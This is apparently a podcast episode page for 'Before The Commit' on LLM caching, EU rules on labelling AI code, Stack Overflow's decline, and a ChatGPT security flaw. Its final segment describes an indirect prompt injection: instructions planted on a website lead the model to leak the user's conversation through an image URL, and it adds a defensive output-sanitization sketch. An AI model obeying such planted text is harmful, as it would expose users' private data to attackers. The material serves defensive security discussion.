Before The Commit
Danny Gershman, Dustin Hilgaertner
18 episodes
6 days ago
AI is writing your code. Who's watching the AI? Before The Commit explores AI coding security, emerging threats, and the trends reshaping software development. Hosts Danny Gershman and Dustin Hilgaertner break down threat models, prompt injection, shadow AI, and practical defenses — drawing from experience across defense, fintech, and enterprise environments. Companion to the book Before The Commit: Securing AI in the Age of Autonomous Code. No hype, just tactical insight for developers, security engineers, and leaders building in the AI era.
Technology
Episode 8: LLM Caching
Before The Commit
1 hour 17 minutes 40 seconds
3 months ago

In this episode, the hosts discuss the latest news and trends in AI, focusing on LLM caching, a new EU regulation on AI-generated code, the changing landscape for Stack Overflow, and a recent AI security vulnerability.

The hosts explain LLM caching as a technique that boosts efficiency and cuts costs for AI providers and developers. It works by saving the parts of a prompt that are sent repeatedly, such as the tool descriptions for a coding agent or a developer's codebase context, so that content doesn't have to be reprocessed on every request. Providers bill these cached tokens at a reduced rate.
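To make the savings concrete, here is a minimal sketch of the cost arithmetic. The rates and discount are hypothetical placeholders, not any provider's actual pricing:

```python
# Illustrative cost comparison for prompt caching.
# The rate and cached_discount values are hypothetical, not real pricing.

def prompt_cost(total_tokens, cached_tokens, rate=3.00, cached_discount=0.10):
    """Cost in dollars for one request, with rate in $ per 1M input tokens.

    Cached tokens (e.g. a repeated system prompt or tool descriptions)
    are billed at a fraction of the normal input rate.
    """
    uncached = total_tokens - cached_tokens
    return (uncached * rate + cached_tokens * rate * cached_discount) / 1_000_000

# A coding agent sends a 10,000-token prompt; 8,000 of those tokens
# (tool specs, repo context) repeat on every call and hit the cache.
no_cache = prompt_cost(10_000, 0)        # full price for all tokens
with_cache = prompt_cost(10_000, 8_000)  # 80% of tokens at the cached rate
print(f"no cache: ${no_cache:.4f}, with cache: ${with_cache:.4f}")
```

Under these assumed numbers the cached request costs roughly a quarter of the uncached one, which is why providers surface cached-token pricing as a separate line item.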

The discussion also highlights proxies like LiteLLM, which can cache and reuse responses across multiple users even when their prompts aren't identical. This is achieved through semantic caching, which matches on the meaning of a query rather than its exact wording, so similar questions receive the same cached answer.
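The idea behind semantic caching can be sketched in a few lines. This toy version uses a bag-of-words vector and cosine similarity in place of a real embedding model, so it only illustrates the lookup logic, not production-quality matching:

```python
import math
from collections import Counter

def embed(text):
    """Toy bag-of-words 'embedding'; a real semantic cache would call
    an embedding model here instead."""
    return Counter(text.lower().split())

def cosine(a, b):
    dot = sum(a[w] * b[w] for w in a)
    na = math.sqrt(sum(v * v for v in a.values()))
    nb = math.sqrt(sum(v * v for v in b.values()))
    return dot / (na * nb) if na and nb else 0.0

class SemanticCache:
    """Return a cached response when a new prompt is 'close enough'
    in meaning to one seen before."""
    def __init__(self, threshold=0.7):
        self.threshold = threshold
        self.entries = []  # list of (embedding, response) pairs

    def get(self, prompt):
        vec = embed(prompt)
        for cached_vec, response in self.entries:
            if cosine(vec, cached_vec) >= self.threshold:
                return response
        return None  # cache miss: fall through to the model

    def put(self, prompt, response):
        self.entries.append((embed(prompt), response))

cache = SemanticCache()
cache.put("how do I reverse a list in python", "Use list[::-1] or list.reverse().")
# A differently worded version of the same question still hits the cache:
print(cache.get("how do I reverse a python list"))
```

The threshold is the key tuning knob: set it too low and users receive stale answers to genuinely different questions, which is also where the security concerns around cross-user response reuse come from.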

The hosts express skepticism about the European Union's new AI Act, which mandates that any code "substantially generated or assisted by an AI system" must be clearly identified. This "AI watermarking" aims to increase transparency, but it has open-source platforms debating whether to accept AI-generated code contributions at all due to legal and compliance issues.

One host questions the regulation's practicality, seeing it as a fear-based, "proactive" measure for a problem that hasn't yet been observed. They point out the difficulty of reliably detecting and labeling AI-written code, especially as AI models improve at mimicking human styles. The hosts also note a study showing that AI coding assistants are more likely to introduce security vulnerabilities because they are trained on public code that often contains bugs and outdated security practices.

The podcast covers the decline of Stack Overflow, attributing it to the rise of generative AI tools. Traffic has dropped, and Stack Overflow has responded by partnering with OpenAI to provide its data and adding its own AI features. The hosts believe Stack Overflow's data is a valuable asset that should be monetized rather than scraped.

They conclude that Stack Overflow and similar content websites face a "generational problem." Younger users are less likely to use traditional sites, preferring integrated experiences like chatbots and AI assistants. They compare the future of the internet to a "Netflix algorithm," where AI will guide users directly to the content they need.

In their "Secure or Sus" segment, the hosts discuss a security flaw that lets a threat actor steal a user's ChatGPT conversation through an "indirect prompt injection." The attacker plants a malicious prompt on a public website. When a user has ChatGPT process that site, the model is tricked into generating an image whose URL secretly encodes the user's conversation; when the client fetches the image, the request delivers that data to the attacker's server.

The hosts explain that this type of data exfiltration attack can be prevented with defensive measures like an LLM proxy and input/output sanitization. They note that similar vulnerabilities could exist in other AI-driven platforms and conclude that security in the age of AI requires proactive, disciplined measures rather than simply reacting to known vulnerabilities.
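One concrete form such output sanitization could take is a proxy-side filter that strips rendered images pointing at non-allowlisted domains, closing the exfiltration channel described above. This is a minimal sketch; the allowlist host and the proxy placement are assumptions, not a description of any specific product:

```python
import re
from urllib.parse import urlparse

# Hypothetical allowlist: only images from hosts you control get rendered.
ALLOWED_IMAGE_HOSTS = {"cdn.example.com"}

# Matches markdown image syntax: ![alt](http...)
MD_IMAGE = re.compile(r"!\[[^\]]*\]\((https?://[^)\s]+)\)")

def sanitize_output(text):
    """Drop markdown images whose URL points outside the allowlist.

    This blocks the exfiltration path from the episode: an image whose
    URL encodes conversation data and targets an attacker's server never
    reaches the client, so the request that would leak data is never made.
    """
    def check(match):
        host = urlparse(match.group(1)).hostname or ""
        if host in ALLOWED_IMAGE_HOSTS:
            return match.group(0)  # trusted host: keep the image
        return "[image removed by proxy]"
    return MD_IMAGE.sub(check, text)

evil = "Here you go! ![x](https://attacker.example/leak?d=SECRET_CHAT)"
print(sanitize_output(evil))  # the attacker-bound image is stripped
```

An output filter like this complements, rather than replaces, input-side sanitization: the injection may still happen, but the channel that carries data out is cut.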
